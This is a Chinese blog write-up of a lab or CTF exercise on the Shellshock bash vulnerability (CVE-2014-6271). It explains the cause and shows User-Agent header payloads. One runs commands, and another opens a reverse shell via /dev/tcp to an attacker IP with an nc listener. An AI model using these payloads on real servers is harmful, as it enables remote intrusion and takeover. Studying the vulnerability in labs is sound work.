Shellshock-破壳漏洞bash命令执行 CVE-2014-6271

影响版本

标志:GNU Bash <= 4.3

shelshocke简介

  • shellshock即unix 系统下的bash shell的一个漏洞,Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统。

漏洞成因:

  • bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题是以“(){”开头定义的环境变量在命令ENV中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。核心的原因在于在输入的过滤中没有严格限制边界,没有做合法化的参数判断。
  • 执行CGI 时会调用Bash将Referer、host、UserAgent、header等作为环境变量进行处理

漏洞复现

(1)访问页面:

 

 

(2)利用过程:

User-Agent: () { :;};echo ;echo $(/bin/ls -al); #列出bin目录下所有文件

 

 

反弹shell

User-Agent: () { :;};echo ; /bin/bash -i >& /dev/tcp/192.168.111.181/12345 0>&1; 
#192.168.111.181为攻击机的ip
#攻击机监听12345端口,等待服务器解析完恶意代码,接受反弹回来的shell

 

nc -lvvp 12345

 

bash-4.3$ whomai
bash-4.3$ ls

 

 

cd /tmp              #拿flag:flag-{bmh93c08202-4584-4bdd-9aae-59fd613510e8}
#成功通过

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值